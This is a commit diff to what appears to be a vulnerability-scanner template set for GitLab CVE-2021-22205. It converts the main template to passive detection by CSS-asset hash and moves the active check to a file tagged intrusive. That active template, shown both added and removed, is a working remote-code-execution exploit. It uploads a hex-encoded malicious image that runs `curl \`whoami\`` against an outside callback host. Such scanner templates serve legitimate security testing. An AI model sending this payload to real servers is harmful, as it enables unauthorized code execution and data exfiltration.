CVE-2021-22205 update (#3568)

*moved cves/2021/CVE-2021-22205.yaml to vulnerabilities/gitlab/gitlab-rce.yaml
*template extension update + added missing severity + misc updates

cves/2021/CVE-2021-22205-fingerprint.yml

@@ -1,127 +0,0 @@
-id: CVE-2021-22205-fingerprint
-
-info:
-  name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool (No Exploit)
-  author: GitLab Red Team
-  description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.  This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests.  Positive matches do not guarantee exploitability.  Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
-  reference:
-    - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
-    - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
-    - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
-    - https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/
-    - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
-    - https://hackerone.com/reports/1154542
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-22205
-  tags: cve,cve2021,gitlab,rce,oast,fingerprinting
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 9.90
-    cve-id: CVE-2021-22205
-    cwe-id: CWE-20
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/users/sign_in"
-    redirects: true
-    max-redirects: 3
-    matchers-condition: and
-    matchers:
-      - type: word
-        condition: or
-        words:
-          - "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
-          - "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
-          - "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
-          - "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
-          - "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
-          - "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753"
-          - "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f"
-          - "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4"
-          - "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4"
-          - "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6"
-          - "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
-          - "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369"
-          - "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae"
-          - "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
-          - "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2"
-          - "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1"
-          - "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac"
-          - "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86"
-          - "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087"
-          - "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86"
-          - "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d"
-          - "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd"
-          - "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514"
-          - "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09"
-          - "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e"
-          - "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb"
-          - "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3"
-          - "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
-          - "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
-          - "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
-          - "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b"
-          - "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44"
-          - "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117"
-          - "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
-          - "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e"
-          - "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
-          - "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb"
-          - "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
-          - "530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf"
-          - "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71"
-          - "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
-          - "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a"
-          - "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
-          - "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2"
-          - "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca"
-          - "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
-          - "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b"
-          - "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5"
-          - "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d"
-          - "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f"
-          - "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab"
-          - "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
-          - "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9"
-          - "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
-          - "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
-          - "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1"
-          - "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b"
-          - "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
-          - "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b"
-          - "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e"
-          - "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
-          - "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
-          - "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
-          - "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
-          - "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b"
-          - "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
-          - "b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445"
-          - "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca"
-          - "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
-          - "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7"
-          - "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
-          - "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
-          - "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
-          - "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
-          - "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
-          - "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
-          - "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c"
-          - "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f"
-          - "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56"
-          - "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3"
-          - "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
-          - "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0"
-          - "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687"
-          - "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
-          - "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd"
-          - "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83"
-          - "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
-          - "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649"
-          - "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
-    extractors:
-      - type: regex
-        name: matched_hash
-        group: 1
-        regex:
-          - '(?:application-)(\S{64})(?:\.css)'

cves/2021/CVE-2021-22205.yaml

@@ -1,63 +1,128 @@
 id: CVE-2021-22205
 
 info:
-  name: GitLab CE/EE Unauthenticated RCE using ExifTool
-  author: pdteam
+  name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection
+  author: GitLab Red Team
   severity: critical
-  description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
+  description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.  This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests.  Positive matches do not guarantee exploitability.  Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
   reference:
+    - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
+    - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
+    - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
+    - https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/
     - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
     - https://hackerone.com/reports/1154542
     - https://nvd.nist.gov/vuln/detail/CVE-2021-22205
-  tags: cve,cve2021,gitlab,rce,oast
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 9.90
     cve-id: CVE-2021-22205
     cwe-id: CWE-20
+  tags: cve,cve2021,gitlab,rce
 
 requests:
-  - raw:
-      - |
-        GET /users/sign_in HTTP/1.1
-        Host: {{Hostname}}
-        Origin: {{BaseURL}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/users/sign_in"
 
-      - |
-        POST /uploads/user HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
-        X-CSRF-Token: {{csrf-token}}
-
-        {{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
-
-    cookie-reuse: true
-    matchers-condition: and
+    redirects: true
+    max-redirects: 3
     matchers:
       - type: word
         words:
-          - 'Failed to process image'
-
-      - type: word
-        part: interactsh_protocol  # Confirms the DNS Interaction
-        words:
-          - "dns"
-
-      - type: status
-        status:
-          - 422
+          - "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
+          - "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
+          - "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
+          - "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
+          - "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
+          - "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753"
+          - "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f"
+          - "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4"
+          - "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4"
+          - "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6"
+          - "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
+          - "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369"
+          - "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae"
+          - "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
+          - "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2"
+          - "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1"
+          - "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac"
+          - "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86"
+          - "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087"
+          - "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86"
+          - "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d"
+          - "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd"
+          - "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514"
+          - "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09"
+          - "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e"
+          - "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb"
+          - "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3"
+          - "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
+          - "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
+          - "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
+          - "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b"
+          - "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44"
+          - "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117"
+          - "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
+          - "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e"
+          - "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
+          - "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb"
+          - "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
+          - "530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf"
+          - "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71"
+          - "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
+          - "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a"
+          - "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
+          - "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2"
+          - "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca"
+          - "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
+          - "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b"
+          - "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5"
+          - "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d"
+          - "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f"
+          - "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab"
+          - "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
+          - "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9"
+          - "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
+          - "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
+          - "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1"
+          - "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b"
+          - "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
+          - "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b"
+          - "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e"
+          - "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
+          - "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
+          - "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
+          - "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
+          - "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b"
+          - "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
+          - "b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445"
+          - "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca"
+          - "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
+          - "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7"
+          - "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
+          - "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
+          - "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
+          - "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
+          - "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
+          - "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
+          - "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c"
+          - "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f"
+          - "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56"
+          - "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3"
+          - "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
+          - "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0"
+          - "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687"
+          - "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
+          - "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd"
+          - "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83"
+          - "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
+          - "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649"
+          - "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
+        condition: or
 
     extractors:
       - type: regex
-        name: csrf-token
-        internal: true
         group: 1
         regex:
-          - 'csrf-token" content="(.*?)" />\n\n<meta'
-
-      - type: regex
-        name: whoami
-        part: interactsh_request
-        group: 1
-        regex:
-          - '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
+          - '(?:application-)(\S{64})(?:\.css)'

vulnerabilities/gitlab/gitlab-rce.yaml

@@ -0,0 +1,63 @@
+id: gitlab-rce
+
+info:
+  name: GitLab CE/EE Unauthenticated RCE using ExifTool
+  author: pdteam
+  severity: critical
+  description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
+  reference:
+    - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
+    - https://hackerone.com/reports/1154542
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-22205
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.90
+    cve-id: CVE-2021-22205
+    cwe-id: CWE-20
+  tags: cve,cve2021,gitlab,rce,oast,intrusive
+
+requests:
+  - raw:
+      - |
+        GET /users/sign_in HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+
+      - |
+        POST /uploads/user HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
+        X-CSRF-Token: {{csrf-token}}
+
+        {{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Failed to process image'
+
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: status
+        status:
+          - 422
+
+    extractors:
+      - type: regex
+        name: csrf-token
+        internal: true
+        group: 1
+        regex:
+          - 'csrf-token" content="(.*?)" />\n\n<meta'
+
+      - type: regex
+        name: whoami
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'